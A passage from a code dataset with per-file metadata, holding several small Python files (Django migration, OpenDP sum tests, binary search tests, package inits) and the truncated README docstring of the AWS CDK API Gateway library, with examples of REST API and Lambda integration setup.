] | 1 | 2018-12-24T11:15:35.000Z | 2018-12-24T11:15:35.000Z | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
] | 9 | 2020-09-06T05:18:03.000Z | 2022-02-26T14:28:38.000Z | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
] | 1 | 2019-05-25T23:24:42.000Z | 2019-05-25T23:24:42.000Z | from asserts import * # noqa
from base import * # noqa
| 19 | 29 | 0.684211 | 8 | 57 | 4.875 | 0.625 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.245614 | 57 | 2 | 30 | 28.5 | 0.906977 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
39784ace7eedad0c2ba8151b1b12257bdc2a921b | 80 | py | Python | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | from csc.nl.euro import StemmedEuroNL
def NL():
return StemmedEuroNL('hu')
| 16 | 37 | 0.725 | 11 | 80 | 5.272727 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 80 | 4 | 38 | 20 | 0.865672 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
845f94a3308da1191f39e97391aaaf86c18b5210 | 126 | py | Python | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | from .avalon_app import AvalonApps
def tray_init(tray_widget, main_widget):
return AvalonApps(main_widget, tray_widget)
| 21 | 47 | 0.809524 | 18 | 126 | 5.333333 | 0.611111 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 5 | 48 | 25.2 | 0.872727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
0827006b95f963f339531de4a50b661d34941094 | 101 | py | Python | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | null | null | null | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | null | null | null | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | 1 | 2021-05-27T14:13:48.000Z | 2021-05-27T14:13:48.000Z | import numpy as _np
def B_axis_circle_length(B_axis_radius: float) -> float:
    """Circumference of the magnetic axis circle, i.e. 2 * pi * radius."""
return 2*_np.pi*B_axis_radius | 25.25 | 46 | 0.811881 | 20 | 101 | 3.65 | 0.7 | 0.205479 | 0.30137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.118812 | 101 | 4 | 47 | 25.25 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
08322847c8c6346d16ac7e48480208f14ce16b3d | 3,406 | py | Python | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-20 18:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('timetable', '0009_coursea_courseb'),
]
operations = [
migrations.AlterField(
model_name='modulegroupsa',
name='csize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='estsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='groupnum',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='maxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='mequivid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='minsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='parentkey',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='prefmaxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='thiskey',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='csize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='estsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='groupnum',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='maxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='mequivid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='minsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='parentkey',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='prefmaxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='thiskey',
field=models.IntegerField(blank=True, null=True),
),
]
| 32.132075 | 61 | 0.559014 | 288 | 3,406 | 6.524306 | 0.170139 | 0.191591 | 0.239489 | 0.277807 | 0.897286 | 0.897286 | 0.874933 | 0.874933 | 0.874933 | 0.846195 | 0 | 0.009569 | 0.325015 | 3,406 | 105 | 62 | 32.438095 | 0.807743 | 0.020258 | 0 | 0.918367 | 1 | 0 | 0.120276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020408 | 0 | 0.05102 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0846d26c2355670c9268357e53b2b8f3225825f3 | 5,540 | py | Python | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 95 | 2021-02-17T19:50:28.000Z | 2022-03-31T16:50:59.000Z | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 299 | 2021-02-10T00:14:41.000Z | 2022-03-31T16:17:33.000Z | python/test/integration/test_sum.py | souravrhythm/opendp | 2c576dbf98389c349ca3a3be928f0e600cd0c10b | [
"MIT"
] | 13 | 2021-04-01T14:40:56.000Z | 2022-03-27T08:52:46.000Z |
def test_sized_bounded_float_sum():
"""known-n bounded float sum (assuming n is public)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_resize, make_sized_bounded_sum
from opendp.meas import make_base_laplace, make_base_gaussian
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point", "contrib")
size = 200
bounds = (0., 20.)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<Float>>
make_cast(TIA=str, TOA=float) >>
# Impute missing values to 0, emit Vec<Float>
make_impute_constant(constant=0.) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Resize dataset length
make_bounded_resize(size=size, bounds=bounds, constant=0.) >>
# Aggregate with sum
make_sized_bounded_sum(size=size, bounds=bounds)
)
# Add noise such that when d_in=1, the result is 1 epsilon DP
laplace_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_laplace(s),
d_in=1, d_out=1.)
gaussian_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_gaussian(s),
d_in=1, d_out=(1., 1e-5))
assert laplace_known_n_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * size)
print(laplace_known_n_sum_from_dataframe(data))
print(gaussian_known_n_sum_from_dataframe(data))
def test_sized_bounded_int_sum():
"""known-n bounded int sum (assuming n is public)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_resize, make_sized_bounded_sum
from opendp.meas import make_base_geometric
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point", "contrib")
size = 200
bounds = (0, 20)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<int>>
make_cast(TIA=str, TOA=int) >>
# Impute missing values to 0, emit Vec<int>
make_impute_constant(constant=0) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Resize dataset length
make_bounded_resize(size=size, bounds=bounds, constant=0) >>
# Aggregate with sum
make_sized_bounded_sum(size=size, bounds=bounds)
)
noisy_known_n_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_geometric(s),
d_in=1, d_out=1.)
assert noisy_known_n_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * size)
print(noisy_known_n_sum_from_dataframe(data))
def test_bounded_float_sum():
"""bounded float sum (assuming n is unknown)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_sum
from opendp.meas import make_base_laplace, make_base_gaussian
from opendp.mod import binary_search_chain, enable_features
enable_features("floating-point")
bounds = (0., 20.)
preprocess = (
# Convert csv string into a dataframe of String columns
make_split_dataframe(",", ['A', 'B']) >>
# Selects a column of df, Vec<str>
make_select_column("A", TOA=str) >>
# Cast the column as Vec<Optional<float>>
make_cast(TIA=str, TOA=float) >>
# Impute missing values to 0, emit Vec<float>
make_impute_constant(constant=0.) >>
# Clamp values
make_clamp(bounds=bounds) >>
# Aggregate with sum. Resize is not necessary with make_bounded_sum, only make_sized_bounded_sum
make_bounded_sum(bounds=bounds)
)
laplace_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_laplace(s),
d_in=1, d_out=1.)
gaussian_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_gaussian(s),
d_in=1, d_out=(1., 1e-5))
assert laplace_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * 100)
print(laplace_sum_from_dataframe(data))
print(gaussian_sum_from_dataframe(data))
def test_bounded_int_sum():
"""bounded int sum (assuming n is unknown)"""
from opendp.trans import make_split_dataframe, make_select_column, \
make_cast, make_impute_constant, \
make_clamp, make_bounded_sum
from opendp.meas import make_base_geometric
from opendp.mod import binary_search_chain
bounds = (0, 20)
preprocess = (
make_split_dataframe(",", ['A', 'B']) >>
make_select_column("A", TOA=str) >>
make_cast(TIA=str, TOA=int) >>
make_impute_constant(constant=0) >>
make_clamp(bounds=bounds) >>
make_bounded_sum(bounds=bounds)
)
noisy_sum_from_dataframe = binary_search_chain(
lambda s: preprocess >> make_base_geometric(s),
d_in=1, d_out=1.)
assert noisy_sum_from_dataframe.check(1, 1.)
data = "\n".join(["1"] * 100)
print(noisy_sum_from_dataframe(data))
| 34.197531 | 104 | 0.668592 | 761 | 5,540 | 4.554534 | 0.128778 | 0.040392 | 0.07386 | 0.030006 | 0.919215 | 0.898442 | 0.831218 | 0.811021 | 0.791979 | 0.791979 | 0 | 0.014713 | 0.227076 | 5,540 | 161 | 105 | 34.409938 | 0.794722 | 0.173827 | 0 | 0.717172 | 0 | 0 | 0.018531 | 0 | 0 | 0 | 0 | 0 | 0.040404 | 1 | 0.040404 | false | 0 | 0.121212 | 0 | 0.161616 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f24c4420519d8ff9d3c8219185e76180bf0159bf | 84 | py | Python | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | null | null | null | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | 17 | 2021-08-10T07:37:47.000Z | 2021-11-26T15:11:12.000Z | version_helper/__init__.py | dl6nm/version-helper | a1ac7c877a79a27643a4049ea633acacfc14b0a5 | [
"MIT"
] | null | null | null | from version_helper.git_tools import Git
from version_helper.version import Version
| 28 | 42 | 0.880952 | 13 | 84 | 5.461538 | 0.461538 | 0.309859 | 0.478873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 84 | 2 | 43 | 42 | 0.934211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f2b173f91c963dd6a9465c220dff490dda645b66 | 505 | py | Python | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | binary_search/test_binary_search.py | vladflore/al-khwarizmi | a1843c936020e78ff34621eb64a3be2b41d70f43 | [
"MIT"
] | null | null | null | from binary_search import binary_search
def test_binary_search_empty_list():
assert binary_search([], 1) == -1
def test_binary_search_item_found1():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 7) == 6
def test_binary_search_item_found2():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 1) == 0
def test_binary_search_item_found3():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 4) == 3
def test_binary_search_item_not_found():
assert binary_search([1, 2, 3, 4, 5, 6, 7], 8) == -1
| 22.954545 | 56 | 0.665347 | 90 | 505 | 3.422222 | 0.266667 | 0.467532 | 0.211039 | 0.308442 | 0.623377 | 0.324675 | 0.324675 | 0.324675 | 0.324675 | 0.324675 | 0 | 0.099515 | 0.184158 | 505 | 21 | 57 | 24.047619 | 0.648058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.454545 | 1 | 0.454545 | true | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
f2b3c5204126d205c59d67307c205f5de9fefba4 | 782,608 | py | Python | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 41 | 2019-08-22T13:03:42.000Z | 2022-02-24T05:07:32.000Z | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 1 | 2020-06-17T17:44:28.000Z | 2021-02-12T22:40:01.000Z | dask-fargate/.env/lib/python3.6/site-packages/aws_cdk/aws_apigateway/__init__.py | chriscoombs/amazon-sagemaker-cdk-examples | ba848218dab59abb03f68dc92bcad7929841fcc9 | [
"Apache-2.0"
] | 31 | 2019-08-23T17:33:41.000Z | 2022-03-28T09:20:07.000Z | """
## Amazon API Gateway Construct Library
<!--BEGIN STABILITY BANNER-->---

---
<!--END STABILITY BANNER-->
Amazon API Gateway is a fully managed service that makes it easy for developers
to publish, maintain, monitor, and secure APIs at any scale. Create an API to
access data, business logic, or functionality from your back-end services, such
as applications running on Amazon Elastic Compute Cloud (Amazon EC2), code
running on AWS Lambda, or any web application.
### Defining APIs
APIs are defined as a hierarchy of resources and methods. `addResource` and
`addMethod` can be used to build this hierarchy. The root resource is
`api.root`.
For example, the following code defines an API that includes the following HTTP
endpoints: `ANY /`, `GET /books`, `POST /books`, `GET /books/{book_id}`, `DELETE /books/{book_id}`.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigateway.RestApi(self, "books-api")
api.root.add_method("ANY")
books = api.root.add_resource("books")
books.add_method("GET")
books.add_method("POST")
book = books.add_resource("{book_id}")
book.add_method("GET")
book.add_method("DELETE")
```
### AWS Lambda-backed APIs
A very common practice is to use Amazon API Gateway with AWS Lambda as the
backend integration. The `LambdaRestApi` construct makes it easy:
The following code defines a REST API that routes all requests to the
specified AWS Lambda function:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
backend = lambda.Function(...)
apigateway.LambdaRestApi(self, "myapi",
handler=backend
)
```
You can also supply `proxy: false`, in which case you will have to explicitly
define the API model:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
backend = lambda.Function(...)
api = apigateway.LambdaRestApi(self, "myapi",
handler=backend,
proxy=False
)
items = api.root.add_resource("items")
items.add_method("GET")# GET /items
items.add_method("POST")# POST /items
item = items.add_resource("{item}")
item.add_method("GET")# GET /items/{item}
# the default integration for methods is "handler", but one can
# customize this behavior per method or even a sub path.
item.add_method("DELETE", apigateway.HttpIntegration("http://amazon.com"))
```
### Integration Targets
Methods are associated with backend integrations, which are invoked when the
method is called. API Gateway supports the following integrations:
* `MockIntegration` - can be used to test APIs. This is the default
integration if one is not specified.
* `LambdaIntegration` - can be used to invoke an AWS Lambda function.
* `AwsIntegration` - can be used to invoke arbitrary AWS service APIs.
* `HttpIntegration` - can be used to invoke HTTP endpoints.
The following example shows how to integrate the `GET /book/{book_id}` method to
an AWS Lambda function:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
get_book_handler = lambda.Function(...)
get_book_integration = apigateway.LambdaIntegration(get_book_handler)
book.add_method("GET", get_book_integration)
```
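The same pattern applies to the other targets. For instance, a hand-written
sketch (not an auto-generated example; the Step Functions `StartExecution`
action is only an illustration) of an `AwsIntegration` that calls an AWS
service API directly:
```python
start_execution = apigateway.AwsIntegration(
    service="states",
    action="StartExecution",
    integration_http_method="POST"
)
```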
Integration options can optionally be specified:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
get_book_integration = apigateway.LambdaIntegration(get_book_handler,
content_handling=apigateway.ContentHandling.CONVERT_TO_TEXT, # convert to base64
credentials_passthrough=True
)
```
Method options can optionally be specified when adding methods:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
book.add_method("GET", get_book_integration,
authorization_type=apigateway.AuthorizationType.IAM,
api_key_required=True
)
```
The following example shows how to use an API Key with a usage plan:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
hello = lambda.Function(self, "hello",
runtime=lambda.Runtime.NODEJS_10_X,
handler="hello.handler",
code=lambda.Code.from_asset("lambda")
)
api = apigateway.RestApi(self, "hello-api")
integration = apigateway.LambdaIntegration(hello)
v1 = api.root.add_resource("v1")
echo = v1.add_resource("echo")
echo_method = echo.add_method("GET", integration, api_key_required=True)
key = api.add_api_key("ApiKey")
plan = api.add_usage_plan("UsagePlan",
name="Easy",
api_key=key
)
plan.add_api_stage(
stage=api.deployment_stage,
throttle=[{
"method": echo_method,
"throttle": {
"rate_limit": 10,
"burst_limit": 2
}
}
]
)
```
### Working with models
When you work with Lambda integrations that are not Proxy integrations, you
have to define your models and mappings for the request, response, and integration.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
hello = lambda.Function(self, "hello",
runtime=lambda.Runtime.NODEJS_10_X,
handler="hello.handler",
code=lambda.Code.from_asset("lambda")
)
api = apigateway.RestApi(self, "hello-api")
resource = api.root.add_resource("v1")
```
You can define more parameters on the integration to tune the behavior of API Gateway:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
integration = LambdaIntegration(hello,
proxy=False,
request_parameters={
# You can define mapping parameters from your method to your integration
# - Destination parameters (the key) are the integration parameters (used in mappings)
# - Source parameters (the value) are the source request parameters or expressions
# @see: https://docs.aws.amazon.com/apigateway/latest/developerguide/request-response-data-mappings.html
"integration.request.querystring.who": "method.request.querystring.who"
},
allow_test_invoke=True,
request_templates={
# You can define a mapping that will build a payload for your integration, based
# on the integration parameters that you have specified
# Check: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"application/json": JSON.stringify(action="sayHello", poll_id="$util.escapeJavaScript($input.params('who'))")
},
# This parameter defines the behavior of the engine is no suitable response template is found
passthrough_behavior=PassthroughBehavior.NEVER,
integration_responses=[{
# Successful response from the Lambda function, no filter defined
# - the selectionPattern filter only tests the error message
# We will set the response status code to 200
"status_code": "200",
"response_templates": {
# This template takes the "message" result from the Lambda function, adn embeds it in a JSON response
# Check https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"application/json": JSON.stringify(state="ok", greeting="$util.escapeJavaScript($input.body)")
},
"response_parameters": {
# We can map response parameters
# - Destination parameters (the key) are the response parameters (used in mappings)
# - Source parameters (the value) are the integration response parameters or expressions
"method.response.header._content-_type": "'application/json'",
"method.response.header._access-_control-_allow-_origin": "'*'",
"method.response.header._access-_control-_allow-_credentials": "'true'"
}
}, {
# For errors, we check if the error message is not empty, get the error data
"selection_pattern": "(\n|.)+",
# We will set the response status code to 200
"status_code": "400",
"response_templates": {
"application/json": JSON.stringify(state="error", message="$util.escapeJavaScript($input.path('$.errorMessage'))")
},
"response_parameters": {
"method.response.header._content-_type": "'application/json'",
"method.response.header._access-_control-_allow-_origin": "'*'",
"method.response.header._access-_control-_allow-_credentials": "'true'"
}
}
]
)
```
You can define models for your responses (and requests):
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
# We define the JSON Schema for the transformed valid response
response_model = api.add_model("ResponseModel",
content_type="application/json",
model_name="ResponseModel",
schema={"$schema": "http://json-schema.org/draft-04/schema#", "title": "pollResponse", "type": "object", "properties": {"state": {"type": "string"}, "greeting": {"type": "string"}}}
)
# We define the JSON Schema for the transformed error response
error_response_model = api.add_model("ErrorResponseModel",
content_type="application/json",
model_name="ErrorResponseModel",
schema={"$schema": "http://json-schema.org/draft-04/schema#", "title": "errorResponse", "type": "object", "properties": {"state": {"type": "string"}, "message": {"type": "string"}}}
)
```
And reference them all in your method definition:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
# If you want to define parameter mappings for the request, you need a validator
validator = api.add_request_validator("DefaultValidator",
validate_request_body=False,
validate_request_parameters=True
)
resource.add_method("GET", integration,
# We can mark the parameters as required
request_parameters={
"method.request.querystring.who": True
},
# We need to set the validator for ensuring they are passed
request_validator=validator,
method_responses=[{
# Successful response from the integration
"status_code": "200",
# Define what parameters are allowed or not
"response_parameters": {
"method.response.header._content-_type": True,
"method.response.header._access-_control-_allow-_origin": True,
"method.response.header._access-_control-_allow-_credentials": True
},
# Validate the schema on the response
"response_models": {
"application/json": response_model
}
}, {
# Same thing for the error responses
"status_code": "400",
"response_parameters": {
"method.response.header._content-_type": True,
"method.response.header._access-_control-_allow-_origin": True,
"method.response.header._access-_control-_allow-_credentials": True
},
"response_models": {
"application/json": error_response_model
}
}
]
)
```
#### Default Integration and Method Options
The `defaultIntegration` and `defaultMethodOptions` properties can be used to
configure a default integration at any resource level. These options will be
used when defining method under this resource (recursively) with undefined
integration or options.
> If not defined, the default integration is `MockIntegration`. See reference
> documentation for default method options.
The following example defines the `booksBackend` integration as a default
integration. This means that all API methods that do not explicitly define an
integration will be routed to this AWS Lambda function.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
books_backend = apigateway.LambdaIntegration(...)
api = apigateway.RestApi(self, "books",
default_integration=books_backend
)
books = api.root.add_resource("books")
books.add_method("GET")# integrated with `booksBackend`
books.add_method("POST")# integrated with `booksBackend`
book = books.add_resource("{book_id}")
book.add_method("GET")
```
### Proxy Routes
The `addProxy` method can be used to install a greedy `{proxy+}` resource
on a path. By default, this also installs an `"ANY"` method:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
proxy = resource.add_proxy(
default_integration=LambdaIntegration(handler),
# "false" will require explicitly adding methods on the `proxy` resource
any_method=True
)
```
### Deployments
By default, the `RestApi` construct will automatically create an API Gateway
[Deployment](https://docs.aws.amazon.com/apigateway/api-reference/resource/deployment/) and a "prod" [Stage](https://docs.aws.amazon.com/apigateway/api-reference/resource/stage/) which represent the API configuration you
defined in your CDK app. This means that when you deploy your app, your API
will be publicly accessible from the internet via the stage URL.
The URL of your API can be obtained from the attribute `restApi.url`, and is
also exported as an `Output` from your stack, so it's printed when you `cdk deploy` your app:
```
$ cdk deploy
...
books.booksapiEndpointE230E8D5 = https://6lyktd4lpk.execute-api.us-east-1.amazonaws.com/prod/
```
To disable this behavior, you can set `{ deploy: false }` when creating your
API. This means that the API will not be deployed and a stage will not be
created for it. You will then need to define `apigateway.Deployment` and
`apigateway.Stage` resources yourself.
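A minimal sketch of the manual setup (the construct names are this module's
public API; the stage name is illustrative):
```python
api = apigateway.RestApi(self, "books", deploy=False)
api.root.add_method("GET")  # an API needs at least one method

deployment = apigateway.Deployment(self, "Deployment", api=api)
apigateway.Stage(self, "ProdStage",
    deployment=deployment,
    stage_name="prod"
)
```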
Use the `deployOptions` property to customize the deployment options of your
API.
The following example will configure API Gateway to emit logs and data traces to
AWS CloudWatch for all API calls:
> By default, an IAM role will be created and associated with API Gateway to
> allow it to write logs and metrics to AWS CloudWatch unless `cloudWatchRole` is
> set to `false`.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigateway.RestApi(self, "books",
deploy_options={
"logging_level": apigateway.MethodLoggingLevel.INFO,
"data_trace_enabled": True
}
)
```
#### Deeper dive: invalidation of deployments
API Gateway deployments are immutable snapshots of the API. This means that we
want to automatically create a new deployment resource every time the API model
defined in our CDK app changes.
In order to achieve that, the AWS CloudFormation logical ID of the
`AWS::ApiGateway::Deployment` resource is dynamically calculated by hashing the
API configuration (resources, methods). This means that when the configuration
changes (e.g. a resource or method is added, or configuration is changed), a new
logical ID will be assigned to the deployment resource. This will cause
CloudFormation to create a new deployment resource.
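The hash only covers the API model itself. If a deployment must also be
replaced when something outside the model changes, extra data can be mixed into
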